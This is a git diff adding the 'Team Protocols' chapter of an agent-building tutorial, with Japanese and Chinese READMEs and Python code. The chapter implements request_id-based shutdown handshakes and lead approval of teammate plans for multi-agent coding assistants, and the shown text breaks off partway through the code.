+|------|------|------|
+| shutdown_request / response | Lead → チームメイト | 適切なシャットダウンハンドシェイク |
+| plan_approval_request / response | チームメイト → Lead | 高リスク操作の事前承認 |
+
+---
+
+## 仕組み
+
+### ProtocolState: 要求の「ファイルカード」
+
+各プロトコル要求は、送信元、送信先、現在の状態、添付内容を記録するファイルカードを作成:
+
+```python
+@dataclass
+class ProtocolState:
+    request_id: str      # 一意 ID、例: "req_004281"
+    type: str            # "shutdown" | "plan_approval"
+    sender: str          # 送信元
+    target: str          # 送信先
+    status: str          # pending | approved | rejected
+    payload: str         # 計画テキストまたは終了理由
+    created_at: float    # タイムスタンプ
+
+pending_requests: dict[str, ProtocolState] = {}
+```
+
+要求送信時にファイルカードを作成し、応答受信時に `request_id`
で該当カードを見つけて状態を更新。
+
+### 4 ステップのプロトコルフロー
+
+シャットダウンを例に、完全な流れ:
+
+```
+① Lead が要求を送信
+   req_id = new_request_id()  # "req_004281"
+   pending_requests[req_id] = ProtocolState(type="shutdown", status="pending", ...)
+   BUS.send("lead", "alice", "Please shut down gracefully.",
+            "shutdown_request", {"request_id": req_id})
+
+② チームメイト受信 → dispatch
+   inbox = BUS.read_inbox("alice")
+   msg_type = msg["type"]  # "shutdown_request"
+   → handle_shutdown_request() にルーティング
+
+③ チームメイト応答
+   BUS.send("alice", "lead", "Shutting down.", "shutdown_response",
+            {"request_id": req_id, "approve": True})
+
+④ Lead が応答を受信 → match
+   match_response("shutdown_response", req_id, approve=True)
+   pending_requests[req_id].status = "approved"
+```
+
+`request_id` は全チェーンを貫通する関連キー — 要求がそれを持って出て行き、応答がそれを持って戻ってくる。
+
+### dispatch_message: タイプ別ルーティング
+
+チームメイトの inbox は通常メッセージだけでなく、プロトコルメッセージも受信する。`handle_inbox_message` はメッセージタイプで振り分け:
+
+```python
+def handle_inbox_message(name, msg, messages):
+    msg_type = msg.get("type", "message")
+    req_id = msg.get("metadata", {}).get("request_id", "")
+
+    if msg_type == "shutdown_request":
+        BUS.send(name, "lead", "Shutting down.", "shutdown_response",
+                 {"request_id": req_id, "approve": True})
+        return True  # ループ停止
+
+    if msg_type == "plan_approval_response":
+        approve = msg["metadata"].get("approve", False)
+        messages.append({"role": "user",
+                         "content": "[Plan approved]" if approve else "[Plan rejected]"})
+        return False  # ループ継続
+```
+
+新しいプロトコルタイプ = 新しい `if` 分岐。新しい状態機械は不要。
+
+### 状態機械:pending → approved / rejected
+
+二つのプロトコルは同じ状態遷移を共有:
+
+```
+pending ──approve──→ approved
+pending ──reject───→ rejected
+```
+
+シャットダウンも計画承認もこの状態機械を使う。Lead が `review_plan(request_id, approve=True)` を呼ぶと:
+
+```python
+def run_review_plan(request_id, approve, feedback=""):
+    state = pending_requests.get(request_id)
+    state.status = "approved" if approve else "rejected"
+    BUS.send("lead", state.sender, feedback,
+             "plan_approval_response",
+             {"request_id": request_id, "approve": approve})
+```
+
+### 組み合わせて実行
+
+```
+1. Lead: "Alice にファイルを作らせて、その後シャットダウン"
+2. Lead → spawn_teammate("alice", "backend", "config.py を作成")
+3. alice スレッド起動 → write_file("config.py", "...") → 完了
+4. Lead → request_shutdown("alice")
+   → BUS.send("shutdown_request", {request_id: "req_000142"})
+5. alice inbox 受信 → handle_shutdown_request → BUS.send("shutdown_response",
+   {request_id: "req_000142", approve: True})
+6. Lead check_inbox → match_response("req_000142", approve=True)
+   → pending_requests["req_000142"].status = "approved"
+```
+
+シャットダウンハンドシェイク完了:要求 → 確認 → 終了。各ステップは `request_id` で追跡可能。
+
+---
+
+## s15 からの変更
+
+| コンポーネント | 変更前 (s15) | 変更後 (s16) |
+|--------------|------------|------------|
+| 連携方式 | 緩いテキストメッセージ | 構造化リクエスト・レスポンスプロトコル |
+| 要求追跡 | なし | ProtocolState + pending_requests dict |
+| メッセージルーティング | 全てテキストとして処理 | dispatch_message タイプ別振り分け |
+| シャットダウン | 自然終了またはスレッド kill | request_id ハンドシェイク機構 |
+| 高リスク操作 | ゲートなし | 計画提出 → Lead 承認 → 実行可能 |
+| 新メッセージタイプ | message, result | + shutdown_request/response, plan_approval_request/response |
+| Lead ツール | 10 (s15) | + request_shutdown, submit_plan, review_plan (13) |
+| チームメイトツール | 4 | + submit_plan (5) |
+
+---
+
+## 試してみる
+
+```sh
+cd learn-claude-code
+python s16_team_protocols/code.py
+```
+
+以下のプロンプトを試してください:
+
+1. `Spawn alice as a backend dev. Ask her to create a file. Then request her shutdown.`
+2. `Spawn bob with a refactoring task. Have him submit a plan first. Then review and approve it.`
+
+観察ポイント:シャットダウンハンドシェイクは完全か(要求 → 確認 → 終了)?`pending_requests` 辞書の状態は正しく遷移しているか?`request_id` は要求と応答で一貫しているか?
+
+---
+
+## 次の章
+
+s15-s16 では、Lead が各チームメイトにタスクを割り当てる必要がある。「Alice はこれ、Bob はあれ」。タスクボードに 10 個の未割り当てタスクがあれば、Lead は 10 回手動で assign しなければならない。
+
+チームメイトが**自分でボードを見て、自分で認領**できたらどうか?Lead はタスクを作成するだけで、チームメイトが自分で発見、認領、完了する。
+
+s17 Autonomous Agents → チームメイトの自己組織化。リーダーの割り当て不要。空き時にポーリング、仕事があれば実行。
+
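本章の request_id 相関の核は、単体で動く小さなスケッチに凝縮できる。教材向けの簡略版で、名前は本章に合わせ、MessageBus の mailbox ファイルの代わりにメモリ上のリストを使う想定:

```python
import random, time
from dataclasses import dataclass, field

@dataclass
class ProtocolState:
    request_id: str
    type: str                 # "shutdown" | "plan_approval"
    sender: str
    target: str
    status: str               # pending | approved | rejected
    payload: str
    created_at: float = field(default_factory=time.time)

pending_requests: dict[str, ProtocolState] = {}
inbox: list[dict] = []        # .mailboxes/alice.jsonl の代わり

def request_shutdown(target: str) -> str:
    """Lead 側:ファイルカードを作成し、要求をバスに載せる。"""
    req_id = f"req_{random.randint(0, 999999):06d}"
    pending_requests[req_id] = ProtocolState(
        request_id=req_id, type="shutdown", sender="lead",
        target=target, status="pending", payload="")
    inbox.append({"type": "shutdown_request",
                  "metadata": {"request_id": req_id}})
    return req_id

def match_response(request_id: str, approve: bool) -> None:
    """Lead 側:request_id で pending のカードを見つけて状態を更新。"""
    pending_requests[request_id].status = "approved" if approve else "rejected"

req_id = request_shutdown("alice")
msg = inbox.pop(0)                        # チームメイトは msg["type"] で dispatch
match_response(msg["metadata"]["request_id"], approve=True)
print(pending_requests[req_id].status)    # approved
```

カードを作る → request_id で突き合わせる、という同じパターンが計画承認にもそのまま使える。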
+CC ソースコード深掘り + +CC のチームプロトコル実装(`teammateMailbox.ts:720-850`)は、チュートリアル版と核心構造が同じ — request_id + approve/reject のリクエスト・レスポンスパターン。違いは以下の通り: + +**シャットダウンプロトコル**:CC のシャットダウンは**三方通信**。Lead が `shutdown_request` を送信 → チームメイトが `shutdown_approved`(または理由付き `shutdown_rejected`)で応答 → システムが `teammate_terminated` で全関係者に通知。シャットダウン確認後、システムが pane(tmux/iTerm2)を自動クリーンアップ、タスクの unassign、team config からメンバーを削除。 + +**計画承認**:CC の `plan_approval_request` / `plan_approval_response` は追加フィールドを持つ — 承認時に同時に `permissionMode` を設定可能(例:「承認するが plan mode で実行」)、応答にはチームメイトが修正して再提出するための `feedback` 文字列を含めることができる。 + +**メッセージ形式**:CC のプロトコルメッセージは構造化 JSON(Zod schema 検証付き)、チュートリアル版は単純な type + metadata 辞書。 + +**汎用性**:チュートリアル版の 1 つの FSM(pending→approved|rejected)で 2 つのプロトコルをカバー — この簡略化は完全に正しい。CC の全プロトコルメッセージは同じ `request_id` 関連メカニズムを共有。 + +
+ + diff --git a/s16_team_protocols/README.md b/s16_team_protocols/README.md new file mode 100644 index 000000000..4ee338341 --- /dev/null +++ b/s16_team_protocols/README.md @@ -0,0 +1,205 @@ +# s16: Team Protocols — 队友之间要有约定 + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → ... → s14 → s15 → `s16` → [s17](../s17_autonomous_agents/) → s18 → s19 + +> *"队友之间要有约定"* — 一个 request-response 模式驱动所有协商。 +> +> **Harness 层**: 协议 — 模型之间的结构化握手。 + +--- + +## 问题 + +公司里让员工离职,不是拍桌子说"你走"。HR 发正式通知,员工说"好,我收尾手头工作",收完交接,HR 确认。每一步都有书面记录,出了问题能追溯。 + +s15 的队友能干活了,但协调是松散的——Lead 发消息,队友回复,没有结构化的协议。两个场景暴露了问题: + +**关机**:Lead 想让 Alice 关机。直接杀线程 → Alice 写了一半的文件留在磁盘上。需要握手:Lead 发请求,Alice 确认收尾后关机。 + +**计划审批**:Bob 想重构认证模块——高风险操作。应该先让 Lead 看 Bob 的计划,审批通过后 Bob 才能动手。 + +这两个场景结构完全一样:**一方发请求,另一方给回复。请求和回复通过同一个 ID 关联。** 不是碰运气说"发个消息希望对方看懂",而是有状态机追踪:pending → approved / rejected。 + +--- + +## 解决方案 + +![Team Protocols Overview](images/team-protocols-overview.svg) + +s15 的全部能力保留(MessageBus、spawn_teammate、inbox 轮询)。新增三样:**ProtocolState**(请求状态追踪)、**dispatch_message**(按消息类型路由到处理器)、**match_response**(通过 request_id 关联回复与请求)。 + +两种协议,一套机制: + +| 协议 | 方向 | 用途 | +|------|------|------| +| shutdown_request / response | Lead → 队友 | 体面关机握手 | +| plan_approval_request / response | 队友 → Lead | 高风险操作先审批 | + +--- + +## 工作原理 + +### ProtocolState: 请求的"档案卡" + +每个协议请求创建一张档案卡,记录谁发的、发给谁、当前状态、附带内容: + +```python +@dataclass +class ProtocolState: + request_id: str # 唯一 ID,如 "req_004281" + type: str # "shutdown" | "plan_approval" + sender: str # 发起方 + target: str # 接收方 + status: str # pending | approved | rejected + payload: str # 计划文本或关机原因 + created_at: float # 时间戳 + +pending_requests: dict[str, ProtocolState] = {} +``` + +发请求时创建档案卡,收回复时通过 `request_id` 找到对应卡片,更新状态。 + +### 四步协议流程 + +以关机为例,完整链路: + +``` +① Lead 发请求 + req_id = new_request_id() # "req_004281" + pending_requests[req_id] = ProtocolState(type="shutdown", status="pending", ...) 
+   BUS.send("lead", "alice", "Please shut down gracefully.",
+            "shutdown_request", {"request_id": req_id})
+
+② 队友收到 → dispatch
+   inbox = BUS.read_inbox("alice")
+   msg_type = msg["type"]  # "shutdown_request"
+   → 路由到 handle_shutdown_request()
+
+③ 队友回复
+   BUS.send("alice", "lead", "Shutting down.", "shutdown_response",
+            {"request_id": req_id, "approve": True})
+
+④ Lead 收响应 → match
+   match_response("shutdown_response", req_id, approve=True)
+   pending_requests[req_id].status = "approved"
+```
+
+`request_id` 是贯穿全链路的关联键——请求带着它出去,回复带着它回来。
+
+### dispatch_message: 按类型路由
+
+队友的 inbox 不只收普通消息,还收协议消息。`handle_inbox_message` 按消息类型分发:
+
+```python
+def handle_inbox_message(name, msg, messages):
+    msg_type = msg.get("type", "message")
+    req_id = msg.get("metadata", {}).get("request_id", "")
+
+    if msg_type == "shutdown_request":
+        BUS.send(name, "lead", "Shutting down.", "shutdown_response",
+                 {"request_id": req_id, "approve": True})
+        return True  # 停止循环
+
+    if msg_type == "plan_approval_response":
+        approve = msg["metadata"].get("approve", False)
+        messages.append({"role": "user",
+                         "content": "[Plan approved]" if approve else "[Plan rejected]"})
+        return False  # 继续循环
+```
+
+新增协议类型 = 新的 `if` 分支,不需要新状态机。
+
+### 状态机:pending → approved / rejected
+
+两种协议共用同一个状态转换:
+
+```
+pending ──approve──→ approved
+pending ──reject───→ rejected
+```
+
+关机用这个状态机,计划审批也用。Lead 调 `review_plan(request_id, approve=True)` 时:
+
+```python
+def run_review_plan(request_id, approve, feedback=""):
+    state = pending_requests.get(request_id)
+    state.status = "approved" if approve else "rejected"
+    BUS.send("lead", state.sender, feedback,
+             "plan_approval_response",
+             {"request_id": request_id, "approve": approve})
+```
+
+### 合起来跑
+
+```
+1. Lead: "让 Alice 创建一个文件,然后关机"
+2. Lead → spawn_teammate("alice", "backend", "创建 config.py")
+3. alice 线程启动 → write_file("config.py", "...") → 完成
+4. Lead → request_shutdown("alice")
+   → BUS.send("shutdown_request", {request_id: "req_000142"})
+5. alice inbox 收到 → handle_shutdown_request → BUS.send("shutdown_response",
+   {request_id: "req_000142", approve: True})
+6. Lead check_inbox → match_response("req_000142", approve=True)
+   → pending_requests["req_000142"].status = "approved"
+```
+
+关机握手完整:请求 → 确认 → 关机。每一步有 `request_id` 追溯。
+
+---
+
+## 相对 s15 的变更
+
+| 组件 | 之前 (s15) | 之后 (s16) |
+|------|-----------|-----------|
+| 协调方式 | 松散文本消息 | 结构化请求-响应协议 |
+| 请求追踪 | 无 | ProtocolState + pending_requests dict |
+| 消息路由 | 全部当文本处理 | dispatch_message 按类型分发 |
+| 关机 | 自然退出或杀线程 | request_id 握手机制 |
+| 高风险操作 | 无门控 | 计划提交 → Lead 审批 → 才能执行 |
+| 新消息类型 | message, result | + shutdown_request/response, plan_approval_request/response |
+| Lead 工具 | 10 (s15) | + request_shutdown, submit_plan, review_plan (13) |
+| 队友工具 | 4 | + submit_plan (5) |
+
+---
+
+## 试一下
+
+```sh
+cd learn-claude-code
+python s16_team_protocols/code.py
+```
+
+试试这些 prompt:
+
+1. `Spawn alice as a backend dev. Ask her to create a file. Then request her shutdown.`
+2. `Spawn bob with a refactoring task. Have him submit a plan first. Then review and approve it.`
+
+观察重点:关机握手是否完整(请求 → 确认 → 关机)?`pending_requests` 字典里的状态是否正确转换?`request_id` 是否在请求和响应之间保持一致?
+
+---
+
+## 接下来
+
+s15-s16 中,Lead 必须给每个队友分配任务。"Alice 做这个,Bob 做那个"。任务看板上有 10 个未认领的任务,Lead 得手动 assign 10 次。
+
+能不能让队友**自己看看板、自己认领**?Lead 只需要创建任务,队友自己发现、自己认领、自己完成。
+
+s17 Autonomous Agents → 队友自组织,不需要领导分配。空闲时轮询,有活就干。
+
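本章的建卡与对账机制可以浓缩成一个可独立运行的小示例。这是教学简化版:名字沿用本章,用内存列表代替 MessageBus 的 mailbox 文件,并以 plan_approval 的拒绝路径为例:

```python
import random, time
from dataclasses import dataclass, field

@dataclass
class ProtocolState:
    request_id: str
    type: str                 # "shutdown" | "plan_approval"
    sender: str
    target: str
    status: str               # pending | approved | rejected
    payload: str
    created_at: float = field(default_factory=time.time)

pending_requests: dict[str, ProtocolState] = {}
lead_inbox: list[dict] = []   # 代替 .mailboxes/lead.jsonl

def submit_plan(sender: str, plan: str) -> str:
    """队友侧:建档案卡 + 发 plan_approval_request。"""
    req_id = f"req_{random.randint(0, 999999):06d}"
    pending_requests[req_id] = ProtocolState(
        request_id=req_id, type="plan_approval", sender=sender,
        target="lead", status="pending", payload=plan)
    lead_inbox.append({"type": "plan_approval_request",
                       "metadata": {"request_id": req_id}})
    return req_id

def review_plan(request_id: str, approve: bool) -> None:
    """Lead 侧:按 request_id 找到档案卡,更新状态。"""
    state = pending_requests[request_id]
    state.status = "approved" if approve else "rejected"

req_id = submit_plan("bob", "重构认证模块")
msg = lead_inbox.pop(0)                    # Lead 的 check_inbox 按类型分发
review_plan(msg["metadata"]["request_id"], approve=False)
print(pending_requests[req_id].status)     # rejected
```

同一套建卡/对账模式原样适用于关机协议,只有 `type` 值和 dispatch 分支不同。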
+深入 CC 源码 + +CC 的团队协议实现(`teammateMailbox.ts:720-850`)和教学版在核心结构上一致——request_id + approve/reject 的请求-响应模式。差异在于: + +**关机协议**:CC 的 shutdown 是**三向通信**。Lead 发 `shutdown_request` → 队友回复 `shutdown_approved`(或 `shutdown_rejected` 附原因)→ 系统发送 `teammate_terminated` 通知所有相关方。关机确认后系统自动清理 pane(tmux/iTerm2)、unassign 任务、从 team config 移除成员。 + +**计划审批**:CC 中 `plan_approval_request` / `plan_approval_response` 携带额外字段——审批时可同时设置 `permissionMode`(如"批准但以 plan mode 运行"),响应中可包含 `feedback` 字符串供队友修正后重新提交。 + +**消息格式**:CC 的协议消息是结构化的 JSON(有 Zod schema 验证),教学版用简单的 type + metadata 字典。 + +**通用性**:教学版的一个 FSM(pending→approved|rejected)对应两种协议——这个简化完全正确。CC 的所有协议消息共用同一个 `request_id` 关联机制。 + +
+ + diff --git a/s16_team_protocols/code.py b/s16_team_protocols/code.py new file mode 100644 index 000000000..6a3a16b65 --- /dev/null +++ b/s16_team_protocols/code.py @@ -0,0 +1,667 @@ +#!/usr/bin/env python3 +""" +s16: Team Protocols — request-response protocol + request_id + dispatch + state machine. + +Run: python s16_team_protocols/code.py +Need: pip install anthropic python-dotenv + .env with ANTHROPIC_API_KEY + +Changes from s15: + - ProtocolState dataclass (request_id, type, sender, status, created_at) + - pending_requests dict: tracks in-flight protocol requests + - dispatch_message: routes incoming messages by type to handlers + - request_shutdown / submit_plan: Lead sends protocol requests + - handle_shutdown_request / handle_plan_request: teammate receives & responds + - match_response: Lead correlates response to original request via request_id + - 3 new tools: request_shutdown, submit_plan, review_plan + +ASCII flow: + Lead: BUS.send("shutdown_request", {request_id}) ──────→ teammate inbox + Teammate: dispatch → handler → BUS.send("shutdown_response", {request_id}) ─→ Lead inbox + Lead: match_response(request_id) → pending_requests[req_id].status = approved +""" + +import os, subprocess, json, time, random, threading +from pathlib import Path +from datetime import datetime +from dataclasses import dataclass, asdict, field + +try: + import readline + readline.parse_and_bind('set bind-tty-special-chars off') +except ImportError: + pass + +from anthropic import Anthropic +from dotenv import load_dotenv + +load_dotenv(override=True) +if os.getenv("ANTHROPIC_BASE_URL"): + os.environ.pop("ANTHROPIC_AUTH_TOKEN", None) + +WORKDIR = Path.cwd() +client = Anthropic(base_url=os.getenv("ANTHROPIC_BASE_URL")) +MODEL = os.environ["MODEL_ID"] + +# ── Task System (from s12) ── + +TASKS_DIR = WORKDIR / ".tasks" +TASKS_DIR.mkdir(exist_ok=True) + + +@dataclass +class Task: + id: str + subject: str + description: str + status: str + owner: str | None + blockedBy: 
list[str] + + +def _task_path(task_id: str) -> Path: + return TASKS_DIR / f"{task_id}.json" + + +def create_task(subject: str, description: str = "", + blockedBy: list[str] | None = None) -> Task: + task = Task( + id=f"task_{int(time.time())}_{random.randint(0, 9999):04d}", + subject=subject, description=description, + status="pending", owner=None, + blockedBy=blockedBy or [], + ) + save_task(task) + return task + + +def save_task(task: Task): + _task_path(task.id).write_text(json.dumps(asdict(task), indent=2)) + + +def load_task(task_id: str) -> Task: + return Task(**json.loads(_task_path(task_id).read_text())) + + +def list_tasks() -> list[Task]: + return [Task(**json.loads(p.read_text())) + for p in sorted(TASKS_DIR.glob("task_*.json"))] + + +def can_start(task_id: str) -> bool: + task = load_task(task_id) + return all(load_task(d).status == "completed" for d in task.blockedBy) + + +def claim_task(task_id: str, owner: str = "agent") -> str: + task = load_task(task_id) + if task.status != "pending": + return f"Task {task_id} is {task.status}, cannot claim" + if not can_start(task_id): + deps = [d for d in task.blockedBy if load_task(d).status != "completed"] + return f"Blocked by: {deps}" + task.owner = owner + task.status = "in_progress" + save_task(task) + print(f" \033[36m[claim] {task.subject} → in_progress\033[0m") + return f"Claimed {task.id} ({task.subject})" + + +def complete_task(task_id: str) -> str: + task = load_task(task_id) + if task.status != "in_progress": + return f"Task {task_id} is {task.status}, cannot complete" + task.status = "completed" + save_task(task) + unblocked = [t.subject for t in list_tasks() + if t.status == "pending" and t.blockedBy and can_start(t.id)] + print(f" \033[32m[complete] {task.subject} ✓\033[0m") + msg = f"Completed {task.id} ({task.subject})" + if unblocked: + msg += f"\nUnblocked: {', '.join(unblocked)}" + return msg + + +# ── Prompt Assembly (from s10) ── + +PROMPT_SECTIONS = { + "identity": "You are a coding agent. 
Act, don't explain.", + "tools": "Available tools: bash, read, write, edit, glob, " + "create_task, list_tasks, claim_task, complete_task, " + "spawn_teammate, send_message, check_inbox, " + "request_shutdown, submit_plan, review_plan.", + "workspace": f"Working directory: {WORKDIR}", + "planning": "For multi-step tasks, use todo_write first.", + "skills": "Skills are on demand: list_skills → load_skill.", + "team": "You can spawn teammate agents. Use request_shutdown for " + "graceful shutdown, submit_plan/review_plan for plan approval.", + "memory": "Relevant memories are injected below when available.", +} + + +def assemble_system_prompt(context: dict) -> str: + sections = [PROMPT_SECTIONS["identity"], + PROMPT_SECTIONS["tools"], + PROMPT_SECTIONS["workspace"]] + if context.get("has_todos"): + sections.append(PROMPT_SECTIONS["planning"]) + if context.get("has_skills"): + sections.append(PROMPT_SECTIONS["skills"]) + if context.get("has_team"): + sections.append(PROMPT_SECTIONS["team"]) + if context.get("memories"): + sections.append(f"Relevant memories:\n{context['memories']}") + return "\n\n".join(sections) + + +_last_context_hash, _last_prompt = None, None + + +def get_system_prompt(context: dict) -> str: + global _last_context_hash, _last_prompt + h = hash(frozenset(context.items())) + if h == _last_context_hash and _last_prompt: + return _last_prompt + _last_context_hash, _last_prompt = h, assemble_system_prompt(context) + return _last_prompt + + +# ── Tools (from s15) ── + +def safe_path(p: str) -> Path: + path = (WORKDIR / p).resolve() + if not path.is_relative_to(WORKDIR): + raise ValueError(f"Path escapes workspace: {p}") + return path + + +def run_bash(command: str) -> str: + try: + r = subprocess.run(command, shell=True, cwd=WORKDIR, + capture_output=True, text=True, timeout=120) + out = (r.stdout + r.stderr).strip() + return out[:50000] if out else "(no output)" + except subprocess.TimeoutExpired: + return "Error: Timeout (120s)" + + +def 
run_read(path: str, limit: int | None = None) -> str: + try: + lines = safe_path(path).read_text().splitlines() + if limit and limit < len(lines): + lines = lines[:limit] + [f"... ({len(lines) - limit} more lines)"] + return "\n".join(lines) + except Exception as e: + return f"Error: {e}" + + +def run_write(path: str, content: str) -> str: + try: + fp = safe_path(path) + fp.parent.mkdir(parents=True, exist_ok=True) + fp.write_text(content) + return f"Wrote {len(content)} bytes to {path}" + except Exception as e: + return f"Error: {e}" + + +# ── MessageBus (from s15) ── + +MAILBOX_DIR = WORKDIR / ".mailboxes" +MAILBOX_DIR.mkdir(exist_ok=True) + + +class MessageBus: + def send(self, from_agent: str, to_agent: str, content: str, + msg_type: str = "message", metadata: dict = None): + msg = {"from": from_agent, "to": to_agent, + "content": content, "type": msg_type, + "ts": time.time(), "metadata": metadata or {}} + inbox = MAILBOX_DIR / f"{to_agent}.jsonl" + with open(inbox, "a") as f: + f.write(json.dumps(msg) + "\n") + print(f" \033[33m[bus] {from_agent} → {to_agent}: " + f"({msg_type}) {content[:50]}\033[0m") + + def read_inbox(self, agent: str) -> list[dict]: + inbox = MAILBOX_DIR / f"{agent}.jsonl" + if not inbox.exists(): + return [] + msgs = [json.loads(line) for line in inbox.read_text().splitlines() + if line.strip()] + inbox.unlink() + return msgs + + +BUS = MessageBus() +active_teammates: dict[str, bool] = {} + + +# ── Protocol State (s16 new) ── + +@dataclass +class ProtocolState: + request_id: str + type: str # "shutdown" | "plan_approval" + sender: str + target: str + status: str # pending | approved | rejected + payload: str # plan text or shutdown reason + created_at: float = field(default_factory=time.time) + + +pending_requests: dict[str, ProtocolState] = {} + + +def new_request_id() -> str: + return f"req_{random.randint(0, 999999):06d}" + + +def match_response(response_type: str, request_id: str, approve: bool): + """Correlate a response to the 
original request via request_id.""" + state = pending_requests.get(request_id) + if not state: + print(f" \033[31m[protocol] unknown request_id: {request_id}\033[0m") + return + state.status = "approved" if approve else "rejected" + icon = "✓" if approve else "✗" + color = "32" if approve else "31" + print(f" \033[{color}m[protocol] {state.type} {icon} " + f"({request_id}: {state.status})\033[0m") + + +# ── Teammate Thread (from s15, + dispatch) ── + +def spawn_teammate_thread(name: str, role: str, prompt: str) -> str: + if name in active_teammates: + return f"Teammate '{name}' already exists" + + system = (f"You are '{name}', a {role}. " + f"Use tools to complete tasks. " + f"Check inbox for protocol messages (shutdown_request, etc).") + + def handle_inbox_message(name: str, msg: dict, messages: list): + """Dispatch incoming protocol messages by type.""" + msg_type = msg.get("type", "message") + meta = msg.get("metadata", {}) + req_id = meta.get("request_id", "") + + if msg_type == "shutdown_request": + # Teammate agrees to shutdown + BUS.send(name, "lead", "Shutting down gracefully.", + "shutdown_response", + {"request_id": req_id, "approve": True}) + print(f" \033[35m[protocol] {name} approved shutdown " + f"({req_id})\033[0m") + return True # Signal: stop the loop + + if msg_type == "plan_approval_response": + # Lead responded to teammate's plan + approve = meta.get("approve", False) + if approve: + messages.append({"role": "user", + "content": f"[Plan approved] Proceed with the task."}) + else: + messages.append({"role": "user", + "content": f"[Plan rejected] Feedback: {msg['content']}"}) + + return False # Continue the loop + + def run(): + messages = [{"role": "user", "content": prompt}] + sub_tools = [ + {"name": "bash", "description": "Run a shell command.", + "input_schema": {"type": "object", + "properties": {"command": {"type": "string"}}, + "required": ["command"]}}, + {"name": "read_file", "description": "Read file.", + "input_schema": {"type": 
"object", + "properties": {"path": {"type": "string"}}, + "required": ["path"]}}, + {"name": "write_file", "description": "Write file.", + "input_schema": {"type": "object", + "properties": {"path": {"type": "string"}, + "content": {"type": "string"}}, + "required": ["path", "content"]}}, + {"name": "send_message", + "description": "Send message to another agent.", + "input_schema": {"type": "object", + "properties": {"to": {"type": "string"}, + "content": {"type": "string"}}, + "required": ["to", "content"]}}, + {"name": "submit_plan", + "description": "Submit a plan for Lead approval.", + "input_schema": {"type": "object", + "properties": {"plan": {"type": "string"}}, + "required": ["plan"]}}, + ] + sub_handlers = { + "bash": run_bash, "read_file": run_read, "write_file": run_write, + "send_message": lambda to, content: (BUS.send(name, to, content), + "Sent")[1], + "submit_plan": lambda plan: _teammate_submit_plan(name, plan), + } + + for _ in range(10): + inbox = BUS.read_inbox(name) + should_stop = False + for msg in inbox: + should_stop = handle_inbox_message(name, msg, messages) + if should_stop: + break + if should_stop: + break + if inbox and not should_stop: + non_protocol = [m for m in inbox + if m.get("type") == "message"] + if non_protocol: + messages.append({"role": "user", + "content": f"{json.dumps(non_protocol)}"}) + try: + response = client.messages.create( + model=MODEL, system=system, messages=messages[-20:], + tools=sub_tools, max_tokens=8000) + except Exception: + break + messages.append({"role": "assistant", "content": response.content}) + if response.stop_reason != "tool_use": + break + results = [] + for block in response.content: + if block.type == "tool_use": + handler = sub_handlers.get(block.name) + output = handler(**block.input) if handler else "Unknown" + results.append({"type": "tool_result", + "tool_use_id": block.id, + "content": str(output)}) + messages.append({"role": "user", "content": results}) + + summary = "Done." 
+ for msg in reversed(messages): + if msg["role"] == "assistant" and isinstance(msg["content"], list): + for b in msg["content"]: + if getattr(b, "type", None) == "text": + summary = b.text + break + else: + continue + break + BUS.send(name, "lead", summary, "result") + active_teammates.pop(name, None) + print(f" \033[32m[teammate] {name} finished\033[0m") + + active_teammates[name] = True + threading.Thread(target=run, daemon=True).start() + print(f" \033[36m[teammate] {name} spawned as {role}\033[0m") + return f"Teammate '{name}' spawned as {role}" + + +def _teammate_submit_plan(from_name: str, plan: str) -> str: + """Teammate submits a plan to Lead for approval.""" + req_id = new_request_id() + pending_requests[req_id] = ProtocolState( + request_id=req_id, type="plan_approval", + sender=from_name, target="lead", + status="pending", payload=plan) + BUS.send(from_name, "lead", plan, + "plan_approval_request", + {"request_id": req_id}) + return f"Plan submitted ({req_id}). Waiting for approval..." 
+ + +# ── Lead Protocol Tools (s16 new) ── + +def run_request_shutdown(teammate: str) -> str: + req_id = new_request_id() + pending_requests[req_id] = ProtocolState( + request_id=req_id, type="shutdown", + sender="lead", target=teammate, + status="pending", payload="") + BUS.send("lead", teammate, "Please shut down gracefully.", + "shutdown_request", + {"request_id": req_id}) + print(f" \033[35m[protocol] shutdown_request → {teammate} " + f"({req_id})\033[0m") + return f"Shutdown request sent to {teammate} (req: {req_id})" + + +def run_submit_plan(teammate: str, plan: str) -> str: + """Lead asks a teammate to submit a plan (delegates to teammate).""" + BUS.send("lead", teammate, f"Please submit a plan for: {plan}", + "message") + return f"Asked {teammate} to submit a plan" + + +def run_review_plan(request_id: str, approve: bool, feedback: str = "") -> str: + state = pending_requests.get(request_id) + if not state: + return f"Request {request_id} not found" + if state.status != "pending": + return f"Request {request_id} already {state.status}" + state.status = "approved" if approve else "rejected" + BUS.send("lead", state.sender, feedback or ("Approved" if approve else "Rejected"), + "plan_approval_response", + {"request_id": request_id, "approve": approve}) + icon = "✓" if approve else "✗" + print(f" \033[32m[protocol] plan {icon} ({request_id})\033[0m") + return f"Plan {'approved' if approve else 'rejected'} ({request_id})" + + +# ── Basic tool handlers ── + +def run_create_task(subject: str, description: str = "", + blockedBy: list[str] | None = None) -> str: + task = create_task(subject, description, blockedBy) + deps = f" (blockedBy: {', '.join(blockedBy)})" if blockedBy else "" + print(f" \033[34m[create] {task.subject}{deps}\033[0m") + return f"Created {task.id}: {task.subject}{deps}" + + +def run_list_tasks() -> str: + tasks = list_tasks() + if not tasks: + return "No tasks." 
+ icons = {"pending": "○", "in_progress": "●", "completed": "✓"} + lines = [] + for t in tasks: + icon = icons.get(t.status, "?") + deps = f" (blockedBy: {', '.join(t.blockedBy)})" if t.blockedBy else "" + owner = f" [{t.owner}]" if t.owner else "" + lines.append(f" {icon} {t.id}: {t.subject} [{t.status}]{owner}{deps}") + return "\n".join(lines) + + +def run_claim_task(task_id: str) -> str: + return claim_task(task_id, owner="agent") + + +def run_complete_task(task_id: str) -> str: + return complete_task(task_id) + + +def run_spawn_teammate(name: str, role: str, prompt: str) -> str: + return spawn_teammate_thread(name, role, prompt) + + +def run_send_message(to: str, content: str) -> str: + BUS.send("lead", to, content) + return f"Sent to {to}" + + +def run_check_inbox() -> str: + msgs = BUS.read_inbox("lead") + if not msgs: + return "(inbox empty)" + lines = [] + for m in msgs: + meta = m.get("metadata", {}) + req_id = meta.get("request_id", "") + tag = f" [{m['type']} req:{req_id}]" if req_id else f" [{m['type']}]" + lines.append(f" [{m['from']}]{tag} {m['content'][:200]}") + return "\n".join(lines) + + +# ── Tool Definitions ── + +TOOLS = [ + {"name": "bash", "description": "Run a shell command.", + "input_schema": {"type": "object", + "properties": {"command": {"type": "string"}}, + "required": ["command"]}}, + {"name": "read_file", "description": "Read file contents.", 